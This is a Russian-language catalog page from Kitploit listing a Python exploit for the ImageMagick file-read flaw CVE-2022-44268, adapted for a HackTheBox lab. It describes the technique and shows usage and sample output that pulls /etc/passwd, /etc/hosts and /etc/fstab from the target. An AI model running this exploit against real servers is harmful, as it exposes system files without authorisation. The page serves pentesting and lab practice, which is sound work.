Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2022-44268 — Автоматизированный эксплойт на Python для CVE-2022-44268 (произвольное чтение файлов в ImageMagick). Загружает подготовленные PNG, извлекает содержимое файлов из возвращённых изображений и сохраняет результаты локально. | Kitploit
Инструменты/GitHubGitHub/jkobierczynski/cve-2022-44268
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииCTFТестирование на Проникновение
GitHubjkobierczynski/cve-2022-44268

cve-2022-44268

Автоматизированный эксплойт на Python для CVE-2022-44268 (произвольное чтение файлов в ImageMagick). Загружает подготовленные PNG, извлекает содержимое файлов из возвращённых изображений и сохраняет результаты локально.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 год назадЕщё не проверено

Эксплойт, адаптированный для HackTheBox Pilgrimage

Автоматический скрипт на Python, использующий cve-2022-44268, чтобы добавить значение profile с именем файла из входного списка файлов во входной файл, обновить загрузку файла изображения с использованием входного файла request.req из Burpsuite (уже включён) для загрузки каждого изменённого изображения, а также загрузить полученные изображения из возвращённого URL и извлечь содержимое файла, поместив его во входной каталог.

root@kitploit:~
$ ./cve-2022-44268.py                                                                 
usage: cve-2022-44268.py [-h] base_png filelist request_req output_dir image_output_dir
cve-2022-44268.py: error: the following arguments are required: base_png, filelist, request_req, output_dir, image_output_dir

$ ./cve-2022-44268.py image.png filelist.lst request.req output_dir image_output_dir
Exploiting for file: /etc/passwd
Saved shrunk image to: image_output_dir/etc_passwd_shrunk.png
Saved extracted content to: output_dir/etc_passwd
Exploiting for file: /etc/hosts
Saved shrunk image to: image_output_dir/etc_hosts_shrunk.png
Saved extracted content to: output_dir/etc_hosts
Exploiting for file: /etc/fstab
Saved shrunk image to: image_output_dir/etc_fstab_shrunk.png
Saved extracted content to: output_dir/etc_fstab
Скачать инструмент